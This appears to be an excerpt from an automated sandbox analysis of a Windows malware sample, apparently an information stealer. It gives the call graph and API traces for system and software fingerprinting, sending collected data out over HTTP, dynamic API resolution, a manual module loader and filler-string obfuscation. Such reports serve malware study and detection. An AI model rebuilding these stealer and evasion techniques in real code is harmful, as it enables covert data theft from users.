14888 ed206a 14887->14888 14889 eda8a0 lstrcpy 14888->14889 14890 ed2073 14889->14890 14891 ed207e GetCurrentProcessId 14890->14891 15504 ed9470 OpenProcess 14891->15504 14894 eda920 3 API calls 14895 ed20a4 14894->14895 14896 eda8a0 lstrcpy 14895->14896 14897 ed20ad 14896->14897 14898 eda9b0 4 API calls 14897->14898 14899 ed20d7 14898->14899 14900 eda8a0 lstrcpy 14899->14900 14901 ed20e0 14900->14901 14902 eda9b0 4 API calls 14901->14902 14903 ed2100 14902->14903 14904 eda8a0 lstrcpy 14903->14904 14905 ed2109 14904->14905 15509 ed7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14905->15509 14908 eda9b0 4 API calls 14909 ed2129 14908->14909 14910 eda8a0 lstrcpy 14909->14910 14911 ed2132 14910->14911 14912 eda9b0 4 API calls 14911->14912 14913 ed2151 14912->14913 14914 eda8a0 lstrcpy 14913->14914 14915 ed215a 14914->14915 14916 eda9b0 4 API calls 14915->14916 14917 ed217b 14916->14917 14918 eda8a0 lstrcpy 14917->14918 14919 ed2184 14918->14919 15513 ed7f60 14919->15513 14922 eda9b0 4 API calls 14923 ed21a4 14922->14923 14924 eda8a0 lstrcpy 14923->14924 14925 ed21ad 14924->14925 14926 eda9b0 4 API calls 14925->14926 14927 ed21cc 14926->14927 14928 eda8a0 lstrcpy 14927->14928 14929 ed21d5 14928->14929 14930 eda9b0 4 API calls 14929->14930 14931 ed21f6 14930->14931 14932 eda8a0 lstrcpy 14931->14932 14933 ed21ff 14932->14933 15526 ed7ed0 GetSystemInfo wsprintfA 14933->15526 14936 eda9b0 4 API calls 14937 ed221f 14936->14937 14938 eda8a0 lstrcpy 14937->14938 14939 ed2228 14938->14939 14940 eda9b0 4 API calls 14939->14940 14941 ed2247 14940->14941 14942 eda8a0 lstrcpy 14941->14942 14943 ed2250 14942->14943 14944 eda9b0 4 API calls 14943->14944 14945 ed2270 14944->14945 14946 eda8a0 lstrcpy 14945->14946 14947 ed2279 14946->14947 15528 ed8100 GetProcessHeap RtlAllocateHeap 14947->15528 14950 eda9b0 4 API calls 14951 ed2299 14950->14951 14952 eda8a0 lstrcpy 14951->14952 14953 ed22a2 14952->14953 14954 eda9b0 4 API calls 14953->14954 14955 ed22c1 14954->14955 14956 eda8a0 lstrcpy 14955->14956 14957 ed22ca 14956->14957 14958 eda9b0 4 API calls 14957->14958 14959 ed22eb 14958->14959 14960 eda8a0 lstrcpy 14959->14960 14961 ed22f4 14960->14961 15534 ed87c0 14961->15534 14964 eda920 3 API calls 14965 ed231e 14964->14965 14966 eda8a0 lstrcpy 14965->14966 14967 ed2327 14966->14967 14968 eda9b0 4 API calls 14967->14968 14969 ed2351 14968->14969 14970 eda8a0 lstrcpy 14969->14970 14971 ed235a 14970->14971 14972 eda9b0 4 API calls 14971->14972 14973 ed237a 14972->14973 14974 eda8a0 lstrcpy 14973->14974 14975 ed2383 14974->14975 14976 eda9b0 4 API calls 14975->14976 14977 ed23a2 14976->14977 14978 eda8a0 lstrcpy 14977->14978 14979 ed23ab 14978->14979 15539 ed81f0 14979->15539 14981 ed23c2 14982 eda920 3 API calls 14981->14982 14983 ed23d5 14982->14983 14984 eda8a0 lstrcpy 14983->14984 14985 ed23de 14984->14985 14986 eda9b0 4 API calls 14985->14986 14987 ed240a 14986->14987 14988 eda8a0 lstrcpy 14987->14988 14989 ed2413 14988->14989 14990 eda9b0 4 API calls 14989->14990 14991 ed2432 14990->14991 14992 eda8a0 lstrcpy 14991->14992 14993 ed243b 14992->14993 14994 eda9b0 4 API calls 14993->14994 14995 ed245c 14994->14995 14996 eda8a0 lstrcpy 14995->14996 14997 ed2465 14996->14997 14998 eda9b0 4 API calls 14997->14998 14999 ed2484 14998->14999 15000 eda8a0 lstrcpy 14999->15000 15001 ed248d 15000->15001 15002 eda9b0 4 API calls 15001->15002 15003 ed24ae 15002->15003 15004 eda8a0 lstrcpy 15003->15004 15005 ed24b7 15004->15005 15547 ed8320 15005->15547 15007 ed24d3 15008 eda920 3 API calls 15007->15008 15009 ed24e6 15008->15009 15010 eda8a0 lstrcpy 15009->15010 15011 ed24ef 15010->15011 15012 eda9b0 4 API calls 15011->15012 15013 ed2519 15012->15013 15014 eda8a0 lstrcpy 15013->15014 15015 ed2522 15014->15015 15016 eda9b0 4 API calls 15015->15016 15017 ed2543 15016->15017 15018 eda8a0 lstrcpy 15017->15018 15019 ed254c 15018->15019 15020 ed8320 17 API calls 15019->15020 15021 ed2568 15020->15021 15022 eda920 3 API calls 15021->15022 15023 ed257b 15022->15023 15024 eda8a0 lstrcpy 15023->15024 15025 ed2584 15024->15025 15026 eda9b0 4 API calls 15025->15026 15027 ed25ae 15026->15027 15028 eda8a0 lstrcpy 15027->15028 15029 ed25b7 15028->15029 15030 eda9b0 4 API calls 15029->15030 15031 ed25d6 15030->15031 15032 eda8a0 lstrcpy 15031->15032 15033 ed25df 15032->15033 15034 eda9b0 4 API calls 15033->15034 15035 ed2600 15034->15035 15036 eda8a0 lstrcpy 15035->15036 15037 ed2609 15036->15037 15583 ed8680 15037->15583 15039 ed2620 15040 eda920 3 API calls 15039->15040 15041 ed2633 15040->15041 15042 eda8a0 lstrcpy 15041->15042 15043 ed263c 15042->15043 15044 ed265a lstrlen 15043->15044 15045 ed266a 15044->15045 15046 eda740 lstrcpy 15045->15046 15047 ed267c 15046->15047 15048 ec1590 lstrcpy 15047->15048 15049 ed268d 15048->15049 15593 ed5190 15049->15593 15051 ed2699 15051->13483 15781 edaad0 15052->15781 15054 ec5009 InternetOpenUrlA 15058 ec5021 15054->15058 15055 ec502a InternetReadFile 15055->15058 15056 ec50a0 InternetCloseHandle InternetCloseHandle 15057 ec50ec 15056->15057 15057->13487 15058->15055 15058->15056 15782 ec98d0 15059->15782 15061 ed0759 15062 ed077d 15061->15062 15063 ed0a38 15061->15063 15065 ed0799 StrCmpCA 15062->15065 15064 ec1590 lstrcpy 15063->15064 15066 ed0a49 15064->15066 15067 ed07a8 15065->15067 15093 ed0843 15065->15093 15958 ed0250 15066->15958 15070 eda7a0 lstrcpy 15067->15070 15072 ed07c3 15070->15072 15071 ed0865 StrCmpCA 15073 ed0874 15071->15073 15111 ed096b 15071->15111 15074 ec1590 lstrcpy 15072->15074 15075 eda740 lstrcpy 15073->15075 15076 ed080c 15074->15076 15078 ed0881 15075->15078 15079 eda7a0 lstrcpy 15076->15079 15077 ed099c StrCmpCA 15081 ed09ab 15077->15081 15082 ed0a2d 15077->15082 15083 eda9b0 4 API calls 15078->15083 15080 ed0823 15079->15080 15084 eda7a0 lstrcpy 15080->15084 15085 ec1590 lstrcpy 15081->15085 15082->13491 15086 ed08ac 15083->15086 15087 ed083e 15084->15087 15088 ed09f4 15085->15088 15089 eda920 3 API calls 15086->15089 15785 ecfb00 15087->15785 15091 eda7a0 lstrcpy 15088->15091 15092 ed08b3 15089->15092 15094 ed0a0d 15091->15094 15095 eda9b0 4 API calls 15092->15095 15093->15071 15097 eda7a0 lstrcpy 15094->15097 15096 ed08ba 15095->15096 15098 eda8a0 lstrcpy 15096->15098 15099 ed0a28 15097->15099 15901 ed0030 15099->15901 15111->15077 15433 eda7a0 lstrcpy 15432->15433 15434 ec1683 15433->15434 15435 eda7a0 lstrcpy 15434->15435 15436 ec1695 15435->15436 15437 eda7a0 lstrcpy 15436->15437 15438 ec16a7 15437->15438 15439 eda7a0 lstrcpy 15438->15439 15440 ec15a3 15439->15440 15440->14314 15442 ec47c6 15441->15442 15443 ec4838 lstrlen 15442->15443 15467 edaad0 15443->15467 15445 ec4848 InternetCrackUrlA 15446 ec4867 15445->15446 15446->14391 15448 eda740 lstrcpy 15447->15448 15449 ed8b74 15448->15449 15450 eda740 lstrcpy 15449->15450 15451 ed8b82 GetSystemTime 15450->15451 15453 ed8b99 15451->15453 15452 eda7a0 lstrcpy 15454 ed8bfc 15452->15454 15453->15452 15454->14406 15456 eda931 15455->15456 15457 eda988 15456->15457 15459 eda968 lstrcpy lstrcat 15456->15459 15458 eda7a0 lstrcpy 15457->15458 15460 eda994 15458->15460 15459->15457 15460->14409 15461->14524 15463 ec9af9 LocalAlloc 15462->15463 15464 ec4eee 15462->15464 15463->15464 15465 ec9b14 CryptStringToBinaryA 15463->15465 15464->14412 15464->14415 15465->15464 15466 ec9b39 LocalFree 15465->15466 15466->15464 15467->15445 15468->14534 15469->14675 15470->14677 15471->14685 15600 ed77a0 15472->15600 15475 ed1c1e 15475->14767 15476 ed76c6 RegOpenKeyExA 15477 ed7704 RegCloseKey 15476->15477 15478 ed76e7 RegQueryValueExA 15476->15478 15477->15475 15478->15477 15480 ed1c99 15479->15480 15480->14781 15482 ed1e09 15481->15482 15482->14823 15484 ed7a9a wsprintfA 15483->15484 15485 ed1e84 15483->15485 15484->15485 15485->14837 15487 ed7b4d 15486->15487 15488 ed1efe 15486->15488 15607 ed8d20 LocalAlloc CharToOemW 15487->15607 15488->14851 15491 eda740 lstrcpy 15490->15491 15492 ed7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15491->15492 15499 ed7c25 15492->15499 15493 ed7d18 15495 ed7d1e LocalFree 15493->15495 15496 ed7d28 15493->15496 15494 ed7c46 GetLocaleInfoA 15494->15499 15495->15496 15498 eda7a0 lstrcpy 15496->15498 15497 eda9b0 lstrcpy lstrlen lstrcpy lstrcat 15497->15499 15501 ed7d37 15498->15501 15499->15493 15499->15494 15499->15497 15500 eda8a0 lstrcpy 15499->15500 15500->15499 15501->14864 15503 ed2008 15502->15503 15503->14879 15505 ed94b5 15504->15505 15506 ed9493 GetModuleFileNameExA CloseHandle 15504->15506 15507 eda740 lstrcpy 15505->15507 15506->15505 15508 ed2091 15507->15508 15508->14894 15510 ed7e68 RegQueryValueExA 15509->15510 15511 ed2119 15509->15511 15512 ed7e8e RegCloseKey 15510->15512 15511->14908 15512->15511 15514 ed7fb9 GetLogicalProcessorInformationEx 15513->15514 15515 ed7fd8 GetLastError 15514->15515 15521 ed8029 15514->15521 15524 ed8022 15515->15524 15525 ed7fe3 15515->15525 15518 ed2194 15518->14922 15519 ed89f0 2 API calls 15522 ed807b 15519->15522 15520 ed89f0 2 API calls 15520->15518 15521->15519 15523 ed8084 wsprintfA 15522->15523 15522->15524 15523->15518 15524->15518 15524->15520 15525->15514 15525->15518 15608 ed89f0 15525->15608 15611 ed8a10 GetProcessHeap RtlAllocateHeap 15525->15611 15527 ed220f 15526->15527 15527->14936 15529 ed89b0 15528->15529 15530 ed814d GlobalMemoryStatusEx 15529->15530 15532 ed8163 15530->15532 15531 ed819b wsprintfA 15533 ed2289 15531->15533 15532->15531 15533->14950 15535 ed87fb GetProcessHeap RtlAllocateHeap wsprintfA 15534->15535 15537 eda740 lstrcpy 15535->15537 15538 ed230b 15537->15538 15538->14964 15540 eda740 lstrcpy 15539->15540 15546 ed8229 15540->15546 15541 ed8263 15543 eda7a0 lstrcpy 15541->15543 15542 eda9b0 lstrcpy lstrlen lstrcpy lstrcat 15542->15546 15544 ed82dc 15543->15544 15544->14981 15545 eda8a0 lstrcpy 15545->15546 15546->15541 15546->15542 15546->15545 15548 eda740 lstrcpy 15547->15548 15549 ed835c RegOpenKeyExA 15548->15549 15550 ed83ae 15549->15550 15551 ed83d0 15549->15551 15552 eda7a0 lstrcpy 15550->15552 15553 ed83f8 RegEnumKeyExA 15551->15553 15554 ed8613 RegCloseKey 15551->15554 15563 ed83bd 15552->15563 15555 ed843f wsprintfA RegOpenKeyExA 15553->15555 15556 ed860e 15553->15556 15557 eda7a0 lstrcpy 15554->15557 15558 ed8485 RegCloseKey RegCloseKey 15555->15558 15559 ed84c1 RegQueryValueExA 15555->15559 15556->15554 15557->15563 15560 eda7a0 lstrcpy 15558->15560 15561 ed84fa lstrlen 15559->15561 15562 ed8601 RegCloseKey 15559->15562 15560->15563 15561->15562 15564 ed8510 15561->15564 15562->15556 15563->15007 15565 eda9b0 4 API calls 15564->15565 15566 ed8527 15565->15566 15567 eda8a0 lstrcpy 15566->15567 15568 ed8533 15567->15568 15569 eda9b0 4 API calls 15568->15569 15570 ed8557 15569->15570 15571 eda8a0 lstrcpy 15570->15571 15572 ed8563 15571->15572 15573 ed856e RegQueryValueExA 15572->15573 15573->15562 15574 ed85a3 15573->15574 15575 eda9b0 4 API calls 15574->15575 15576 ed85ba 15575->15576 15577 eda8a0 lstrcpy 15576->15577 15578 ed85c6 15577->15578 15579 eda9b0 4 API calls 15578->15579 15580 ed85ea 15579->15580 15581 eda8a0 lstrcpy 15580->15581 15582 ed85f6 15581->15582 15582->15562 15584 eda740 lstrcpy 15583->15584 15585 ed86bc CreateToolhelp32Snapshot Process32First 15584->15585 15586 ed875d CloseHandle 15585->15586 15587 ed86e8 Process32Next 15585->15587 15588 eda7a0 lstrcpy 15586->15588 15587->15586 15589 ed86fd 15587->15589 15590 ed8776 15588->15590 15589->15587 15591 eda9b0 lstrcpy lstrlen lstrcpy lstrcat 15589->15591 15592 eda8a0 lstrcpy 15589->15592 15590->15039 15591->15589 15592->15589 15594 eda7a0 lstrcpy 15593->15594 15595 ed51b5 15594->15595 15596 ec1590 lstrcpy 15595->15596 15597 ed51c6 15596->15597 15612 ec5100 15597->15612 15599 ed51cf 15599->15051 15603 ed7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15600->15603 15602 ed76b9 15602->15475 15602->15476 15604 ed7765 RegQueryValueExA 15603->15604 15605 ed7780 RegCloseKey 15603->15605 15604->15605 15606 ed7793 15605->15606 15606->15602 15607->15488 15609 ed8a0c 15608->15609 15610 ed89f9 GetProcessHeap HeapFree 15608->15610 15609->15525 15610->15609 15611->15525 15613 eda7a0 lstrcpy 15612->15613 15614 ec5119 15613->15614 15615 ec47b0 2 API calls 15614->15615 15616 ec5125 15615->15616 15772 ed8ea0 15616->15772 15618 ec5184 15619 ec5192 lstrlen 15618->15619 15620 ec51a5 15619->15620 15621 ed8ea0 4 API calls 15620->15621 15622 ec51b6 15621->15622 15623 eda740 lstrcpy 15622->15623 15624 ec51c9 15623->15624 15625 eda740 lstrcpy 15624->15625 15626 ec51d6 15625->15626 15627 eda740 lstrcpy 15626->15627 15628 ec51e3 15627->15628 15629 eda740 lstrcpy 15628->15629 15630 ec51f0 15629->15630 15631 eda740 lstrcpy 15630->15631 15632 ec51fd InternetOpenA StrCmpCA 15631->15632 15633 ec522f 15632->15633 15634 ec58c4 InternetCloseHandle 15633->15634 15635 ed8b60 3 API calls 15633->15635 15641 ec58d9 codecvt 15634->15641 15636 ec524e 15635->15636 15637 eda920 3 API calls 15636->15637 15638 ec5261 15637->15638 15639 eda8a0 lstrcpy 15638->15639 15640 ec526a 15639->15640 15642 eda9b0 4 API calls 15640->15642 15645 eda7a0 lstrcpy 15641->15645 15643 ec52ab 15642->15643 15644 eda920 3 API calls 15643->15644 15646 ec52b2 15644->15646 15653 ec5913 15645->15653 15647 eda9b0 4 API calls 15646->15647 15648 ec52b9 15647->15648 15649 eda8a0 lstrcpy 15648->15649 15650 ec52c2 15649->15650 15651 eda9b0 4 API calls 15650->15651 15652 ec5303 15651->15652 15654 eda920 3 API calls 15652->15654 15653->15599 15655 ec530a 15654->15655 15656 eda8a0 lstrcpy 15655->15656 15657 ec5313 15656->15657 15658 ec5329 InternetConnectA 15657->15658 15658->15634 15659 ec5359 HttpOpenRequestA 15658->15659 15661 ec58b7 InternetCloseHandle 15659->15661 15662 ec53b7 15659->15662 15661->15634 15663 eda9b0 4 API calls 15662->15663 15664 ec53cb 15663->15664 15665 eda8a0 lstrcpy 15664->15665 15666 ec53d4 15665->15666 15667 eda920 3 API calls 15666->15667 15668 ec53f2 15667->15668 15669 eda8a0 lstrcpy 15668->15669 15670 ec53fb 15669->15670 15671 eda9b0 4 API calls 15670->15671 15672 ec541a 15671->15672 15673 eda8a0 lstrcpy 15672->15673 15674 ec5423 15673->15674 15675 eda9b0 4 API calls 15674->15675 15676 ec5444 15675->15676 15677 eda8a0 lstrcpy 15676->15677 15678 ec544d 15677->15678 15679 eda9b0 4 API calls 15678->15679 15680 ec546e 15679->15680 15681 eda8a0 lstrcpy 15680->15681 15773 ed8ead CryptBinaryToStringA 15772->15773 15774 ed8ea9 15772->15774 15773->15774 15775 ed8ece GetProcessHeap RtlAllocateHeap 15773->15775 15774->15618 15775->15774 15776 ed8ef4 codecvt 15775->15776 15777 ed8f05 CryptBinaryToStringA 15776->15777 15777->15774 15781->15054 16024 ec9880 15782->16024 15784 ec98e1 15784->15061 15786 eda740 lstrcpy 15785->15786 15787 ecfb16 15786->15787 15959 eda740 lstrcpy 15958->15959 15960 ed0266 15959->15960 15961 ed8de0 2 API calls 15960->15961 15962 ed027b 15961->15962 15963 eda920 3 API calls 15962->15963 15964 ed028b 15963->15964 15965 eda8a0 lstrcpy 15964->15965 15966 ed0294 15965->15966 15967 eda9b0 4 API calls 15966->15967 15968 ed02b8 15967->15968 15969 eda8a0 lstrcpy 15968->15969 16025 ec988e 16024->16025 16028 ec6fb0 16025->16028 16027 ec98ad codecvt 16027->15784 16031 ec6d40 16028->16031 16032 ec6d63 16031->16032 16043 ec6d59 16031->16043 16032->16043 16045 ec6660 16032->16045 16034 ec6dbe 16034->16043 16051 ec69b0 16034->16051 16036 ec6e2a 16037 ec6ee6 VirtualFree 16036->16037 16039 ec6ef7 16036->16039 16036->16043 16037->16039 16038 ec6f41 16040 ed89f0 2 API calls 16038->16040 16038->16043 16039->16038 16041 ec6f38 16039->16041 16042 ec6f26 FreeLibrary 16039->16042 16040->16043 16044 ed89f0 2 API calls 16041->16044 16042->16039 16043->16027 16044->16038 16048 ec668f VirtualAlloc 16045->16048 16047 ec6730 16049 ec673c 16047->16049 16050 ec6743 VirtualAlloc 16047->16050 16048->16047 16048->16049 16049->16034 16050->16049 16052 ec69c9 16051->16052 16057 ec69d5 16051->16057 16053 ec6a09 LoadLibraryA 16052->16053 16052->16057 16055 ec6a32 16053->16055 16053->16057 16054 ec6ae0 16054->16057 16058 ec6ba8 GetProcAddress 16054->16058 16055->16054 16061 ed8a10 GetProcessHeap RtlAllocateHeap 16055->16061 16057->16036 16058->16054 16058->16057 16059 ed89f0 2 API calls 16059->16054 16060 ec6a8b 16060->16057 16060->16059 16061->16060

                                Executed Functions

                                Function 00ED9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 ed9860-ed9874 call ed9750 663 ed987a-ed9a8e call ed9780 GetProcAddress * 21 660->663 664 ed9a93-ed9af2 LoadLibraryA * 5 660->664 663->664 666 ed9b0d-ed9b14 664->666 667 ed9af4-ed9b08 GetProcAddress 664->667 669 ed9b46-ed9b4d 666->669 670 ed9b16-ed9b41 GetProcAddress * 2 666->670 667->666 671 ed9b4f-ed9b63 GetProcAddress 669->671 672 ed9b68-ed9b6f 669->672 670->669 671->672 673 ed9b89-ed9b90 672->673 674 ed9b71-ed9b84 GetProcAddress 672->674 675 ed9bc1-ed9bc2 673->675 676 ed9b92-ed9bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,00DA2338), ref: 00ED98A1
                                • GetProcAddress.KERNEL32(74DD0000,00DA21B8), ref: 00ED98BA
                                • GetProcAddress.KERNEL32(74DD0000,00DA2380), ref: 00ED98D2
                                • GetProcAddress.KERNEL32(74DD0000,00DA2230), ref: 00ED98EA
                                • GetProcAddress.KERNEL32(74DD0000,00DA21D0), ref: 00ED9903
                                • GetProcAddress.KERNEL32(74DD0000,00DA8E48), ref: 00ED991B
                                • GetProcAddress.KERNEL32(74DD0000,00D95210), ref: 00ED9933
                                • GetProcAddress.KERNEL32(74DD0000,00D953D0), ref: 00ED994C
                                • GetProcAddress.KERNEL32(74DD0000,00DA22F0), ref: 00ED9964
                                • GetProcAddress.KERNEL32(74DD0000,00DA2398), ref: 00ED997C
                                • GetProcAddress.KERNEL32(74DD0000,00DA2248), ref: 00ED9995
                                • GetProcAddress.KERNEL32(74DD0000,00DA2350), ref: 00ED99AD
                                • GetProcAddress.KERNEL32(74DD0000,00D95410), ref: 00ED99C5
                                • GetProcAddress.KERNEL32(74DD0000,00DA2368), ref: 00ED99DE
                                • GetProcAddress.KERNEL32(74DD0000,00DA20F8), ref: 00ED99F6
                                • GetProcAddress.KERNEL32(74DD0000,00D95490), ref: 00ED9A0E
                                • GetProcAddress.KERNEL32(74DD0000,00DA2110), ref: 00ED9A27
                                • GetProcAddress.KERNEL32(74DD0000,00DA2140), ref: 00ED9A3F
                                • GetProcAddress.KERNEL32(74DD0000,00D952D0), ref: 00ED9A57
                                • GetProcAddress.KERNEL32(74DD0000,00DA2158), ref: 00ED9A70
                                • GetProcAddress.KERNEL32(74DD0000,00D954D0), ref: 00ED9A88
                                • LoadLibraryA.KERNEL32(00DA2488,?,00ED6A00), ref: 00ED9A9A
                                • LoadLibraryA.KERNEL32(00DA2410,?,00ED6A00), ref: 00ED9AAB
                                • LoadLibraryA.KERNEL32(00DA2458,?,00ED6A00), ref: 00ED9ABD
                                • LoadLibraryA.KERNEL32(00DA2428,?,00ED6A00), ref: 00ED9ACF
                                • LoadLibraryA.KERNEL32(00DA2470,?,00ED6A00), ref: 00ED9AE0
                                • GetProcAddress.KERNEL32(75A70000,00DA24A0), ref: 00ED9B02
                                • GetProcAddress.KERNEL32(75290000,00DA2440), ref: 00ED9B23
                                • GetProcAddress.KERNEL32(75290000,00DA24B8), ref: 00ED9B3B
                                • GetProcAddress.KERNEL32(75BD0000,00DA23F8), ref: 00ED9B5D
                                • GetProcAddress.KERNEL32(75450000,00D95390), ref: 00ED9B7E
                                • GetProcAddress.KERNEL32(76E90000,00DA8EE8), ref: 00ED9B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00ED9BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00ED9BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction ID: 368aaca265a629e11adce1e31b7d42841a0857fdb81c88242388e58c555208db
                                • Opcode Fuzzy Hash: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction Fuzzy Hash: CAA11BB5D107409FD36EEFA8F99895637F9FF8C302704853AA6268324CD6BA95C1CB50
                                Function 00EC45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 ec45c0-ec4695 RtlAllocateHeap 781 ec46a0-ec46a6 764->781 782 ec46ac-ec474a 781->782 783 ec474f-ec47a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EC479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC462D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
